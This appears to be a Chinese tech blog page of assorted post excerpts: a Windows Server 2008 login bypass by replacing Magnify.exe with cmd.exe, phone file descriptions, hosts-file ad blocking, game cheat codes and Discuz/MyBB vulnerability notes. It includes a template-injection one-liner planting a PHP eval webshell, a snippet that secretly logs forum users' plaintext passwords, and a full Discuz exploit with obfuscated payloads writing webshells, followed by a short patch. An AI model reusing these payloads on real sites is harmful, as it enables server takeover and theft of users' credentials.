Chinadu's Blog

Windows Server 2008是微软Windows服务器产品中最新的操作系统版本。它是基于Windows NT 6.0 SP1的内核。
Microsoft详细信息：http://www.microsoft.com/china/windowsserver2008/

虽然与早期版本相比非常安全，但它可以很容易地绕过密码保护进入主机。
在本文中，我将展示一个简单而有效的方法绕过Windows Server 2008的密码保护。

概念演示：
为了能够绕过密码保护，我们首先需要添加PING CD盘(http://ping.windowsdream.com/ping/Releases/3.00.01/PING-3.00.iso)或其他支持 NTFS-3G驱动的Linux Live光盘（NTFS-3G是一个跨平台执行的Windows NTFS文件系统，支持读/写能力）。

我们首先检查哪个分区是Windows NTFS分区，在这个例子中是/dev/sd1。
fdisk –l | grep NTFS

然后，我们创建目录，将安装Windows文件：
mkdir –p /mnt/windows

因此，我们将Windows分区中的NTFS-3G驱动挂载到/mnt/Windows目录中：
mount –t ntfs-3g /dev/sda1/mnt/windows

现在，我们将一个可执行文件cmd.exe替换为Magnify.exe文件：
mv Magnify.exe Magnify.bck
cp cmd.exe Magnify.exe

阅读全文...

谷歌，Adobe和其他大公司有针对性的攻击的消息上周已经被披露，最初安全人员们预计是采用恶意的PDF文件进行攻击，但在上周四，微软承认攻击是由一个Internet Explorer中新的安全漏洞引发。
目前已经检测到针对此漏洞的攻击代码正在蔓延，相应的恶意代码页面也已经出现，安全研究机构WebSense今日发出安全警告，以下是技术分析截图：

阅读全文...

1. C盘文件的具体介绍
C盘文件的具体介绍·（E盘文件的原理和C盘基本一样）·
Images 图像，图片存储文件夹
Sounds 声音片段，包含两个子文件夹
Sounds/Simple 铃声
Sounds/Digital 数字声音
Videos 视频片段，视频文件存储文件夹
Others 其他
System 是手机安装文件的系统文件夹下面对它里面的文件和文件夹做下具体的介绍：
Apps 存放的是安装软件程序的文件夹。
Apps/Phone 是更改网标后形成的文件夹，此目录中还有oplogo的子目录，bmp文件就存在这个目录里，删除这个文件就可以恢复手机默认的网标。
bootdata 存放的是手机导入数据，最好不要删除或者修改里面的文件。
Data 存放的是如ini、dat、cdr等后缀的文件，这些是程序所保存设置的数据，最好不要删除或者修改里面的文件。
dataNotepad.dat 存放的是记事本中的内容。
databackgroundimage.mbm 存放的是桌面墙纸图片文件。
dataApplications.dat 存放的是程序数据文件。
datawapstore 存放的是用WAP上网时的一些设定和网页缓存。
systemDataCLOCKAPP.dat 存放的是时钟设定存档文件。
systemDataCntModel.ini 存放的是电话本初始化文件。
systemDataContacts.cdb 存放的是电话本数据文件。
systemDataLogdbu.dat 手机的通讯数据文件。
systemDatamedialPlayer.dat 自带的RealOne播放机。
systemDatamms_seting.Dat 彩信的设置。
systemDataPinboard 捷径。
systemDataCalcsoft 自带的计算器。
systemDataCalendar 自带的日历。
DataTemplate.n01 存放的是手机短信信模版文件。
DataUnitConverter.int 手存放的是单位转换器初始化文件。
DataBookmarks.db 存放的是书签数据文件,用来记录WAP地址。
DataCACerts.dat 存放的是安装各种软件的证书文件。
Mail 目录下存放着短消息、彩信、电子邮件以及相关的一些设置文件。
SKINS 存放的是主题文件。
Shareddata 存放的是一些程序运行后的写入设置数据。
Temp和YReg 存放的是些临时目录。
Libs 目录里存放着软件相关的dll文件。
midp 存放的是安装的java程序。
Mtm 是有关信息设置的目录
Programs 存放的是一些自动加载的程序文件。
Recogs 存放的是关联方式文件的目录。
Schedules 存放的是一些计划任务类的文件。
favourites 存放的是收藏夹的文件，可移动到E盘的System中，收藏夹是不会受到影响。
install 存放的是软件的安装记录，其中install log文件可以删除，而带有sis后缀的文件最好不要删除，以免以后不能在程序管理里看到并删除程序了。
Magic101 在安装MGS平台的程序以后以后才会生成。
System.ini 系统初始化配置文件，可以删除，但是下次开机使用程序，系统还会再次生成。
Backup.xml 存放的是备份数据
**注意** C盘里面大多是系统文件，不知道它是究竟什么，以及具体的作用是什么，最好不要删除，以免删错了以后，导致手机的一些程序不能正常运行。
阅读全文...

现在越来越多的人在迅雷上看电影了。我也很喜欢，但是我很不喜欢迅雷看看上的15秒广告。当然，也有迅雷工具的广告也很麻烦。于是，我就在网络上搜罗了一翻，找到了一些迅雷屏蔽的技巧。
[修改时，请先将迅雷程序关闭！]

1. 去除迅雷看看15秒广告

在 C:WINDOWSsystem32driversetc 目录下，用记事本打开 hosts 文件。

复制内容到剪贴板 程序代码
找到
127.0.0.1 localhost
在之后加入
------ 屏蔽迅雷看看广告 ------
0.0.0.0 pubstat.sandai.net
0.0.0.0 mcfg.sandai.net
0.0.0.0 biz5.sandai.net
0.0.0.0 float.sandai.net
0.0.0.0 recommend.xunlei.com
0.0.0.0 cl.kankan.xunlei.com

2. 禁止迅雷偷偷上传
阅读全文...

by flyh4t
team: http://www.80vul.com
date: 2010-01-10

测试版本MyBB 1.44.11

[一]漏洞分析

在index.php文件336行左右代码如下：

//index.php,336行左右

$plugins->run_hooks("index_end");
//出现了eval函数，注意参数
eval("$index = "".$templates->get("index")."";");
output_page($index);

看以下eval()函数中的内容是否可以控制，继续找到templates类查看get函数的定义:
阅读全文...

一直在测试5800的各项功能，也遇到了网友说到的一些问题，包括照相问题，在没有任何设置的时候拍下一张照片，非常难看，很模糊，一开始以为是5800自带相机问题，还有的人说5800相机水准不行，经过我的测试，不是这样的，只是我们不会用5800相机而已，其实5800不同于我们以往用的手机拍摄，一键搞定，5800拍照需要很多设置，我要教大家的是如何去设置，这些设置都有什么用。如果你明白了，肯定是会拍出清晰的照片。
1.如何进入设置?哪些个设置重要?哪些个设置不需要动,影响不大.

阅读全文...

1、下载HP_USB_FW.rar，This tool can setup a booting USB flash disk。他可以创建dos的引导程序到U盘里面。下载后解压，执行HPUSBFW.EXE，选FAT32文件系统，快速格式化，要选中创建dos启动 盘，路径指向解压目录下的HPUSBFW目录，这个目录下有引导程序COMMAND.COM、IO.SYS、MSDOS.SYS，这3个文件在格式化完成 后被copy到移动硬盘跟目录下。

阅读全文...

编辑模板的时候写入这几行,拆开写一句话,就行了:

1. <!--{eval $content = "@eval($_POST[c])";}-->

2. <!--{eval $test1 = "<"."?"."php ".$content."?>";}-->

3. <!--{eval fputs(fopen(S_ROOT.'./templates/default/model_cache.php','w+'),$test1);}-->

PS:引用一句俗话：“外行看热闹，内行看门道” 雷死人了。

注意看镜头中的system32目录中dir命令，完全受捕鸟啦，主角太高端啦。

1.输入-ars+开启英雄自动无限重生
同理输入-ars-关闭英雄自动无限重生

开启后 英雄死后会立即在原地复活

2.-uci
一些ID:
stel 传送权杖
stwp 回城
spre 保存权杖
ankh 重生十字架
srrc 复活卷轴
modt 死亡面罩
hbth 战舰之舵(太强了)
gemt 显形宝石
gsou 灵魂宝石(太BT了 最好不要乱用啊 尤其是RPG)
rnsp 残废之球
odef 黑暗之球
ofro 霜冻之球
sora 影子之球
oslo 减速之球
oven 毒液之球
ofir 火焰之球
ocor 腐蚀之球
oli2 都是闪电之球
fgrd 红龙卵
rde1 速度之锤
mlst 力量之锤
sksh 邪恶护盾
flag 胜利旗帜(人类)
nflg 胜利旗帜(暗夜)
oflg 胜利旗帜(兽族)
uflg 胜利旗帜(不死族)
ckng 国王之冠 +20
ratf 无极战斧
rde4 无极护盾
rat6 无极战弓
prvt 无极权杖
evtl 闪避护符
spsh 魔法护盾护身符
3.显示所有玩家信息

输入-list

4.魔免

选定单位
在单位特殊属性菜单设置(也可用删除所有特殊属性去掉)

输入-umm也可开启 删除也可以-umm-

5.加钱

输入-rm 钱数
输入-rw 木头数
如果想减少 空格可以换成-
例子:
加200钱:-rm 200
减50木头:-rw-50

6.升级

选定英雄 按住←→再按↓

输入-hu 级别
比如输入-hu 2 升级2
空格换成-可以减去等级

加力量
(对选中英雄)
1.按键盘↑+←(间隔2s内)

2.输入-hl 数值
(空格换成-可以减去)
例子:
加20力量:-hl 20
减力量5:-hl-5

(对选中英雄)
1.按键盘↑+↓(间隔2s内)

2.输入-hm 数值
(空格换成-可以减去)
例子:
加20敏捷:-hm 20
减敏捷5:-hm-5

加智力
(对选中英雄)
1.按键盘↑+→(间隔2s内)

2.输入-hz 数值
(空格换成-可以减去)
例子:
加20智力:-hz 20
减智力5:-hz-5

加三围
(对选中英雄)
1.按住键盘↑↓再按→

2.输入-ha 数值
(空格换成-可以减去)
例子:
加20三围:-ha 20
减三围5:-ha-5

7.开地图

(只会自己开 不会对盟友共享[盟友看见是正常视野])
1.连按5次↑(2s内)

8.自动清除CD

在自动化菜单设置

输入-acd+开启自动清除CD
同理输入-acd-关闭自动清除CD

内容如下：

$ip=$_SERVER['REMOTE_ADDR'];
$showtime=date("Y-m-d H:i:s");
$record="".$username." --------".$password." IP:".$ip." Time:".$showtime."\r\n";
$handle=fopen('./ipdata/csshacklog.php','a+');
$write=fwrite($handle,$record);

修改uc_client目录下的client.php 在

阅读全文...

1.注册一个新用户
2.Exp代码如下：

<form method="post" action=" http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data">

帖子ID，指定一个存在的帖子即可：<input type="text" name="tid" value="1" />

<input type="hidden" name="action" value="imme_binding" />

<input type="hidden" name="response[result]" value="1:2" />

<input type="hidden" name="scriptlang[1][2]" value="${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).

chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).

chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).

chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).

chr(99).chr(104).chr(101).chr(47).chr(117).

chr(115).chr(101).chr(114).chr(103).chr(114).

chr(111).chr(117).chr(112).chr(95).chr(48).

chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).

chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).

chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).

chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).

chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).

chr(91).chr(99).chr(109).chr(100).chr(93).

chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}" />

<input type="submit" name="topicsubmit" value="提交" class="submit" />

</form>

chr解码后是：

value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'<?php eval($_POST[cmd])?>');

保存html

打开点提交，会生产forumdata/cache/usergroup_01.php一句话文件，密码是cmd

第二种方法：

直接GET，利用语句：

misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),

base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}

在根目录生成C.PHP密码是C

临时修补方法：

在common.inc.php上面加上

$response=$scriptlang=array();

官方发布修补补丁：

http://www.discuz.net/thread-1537673-1-1.html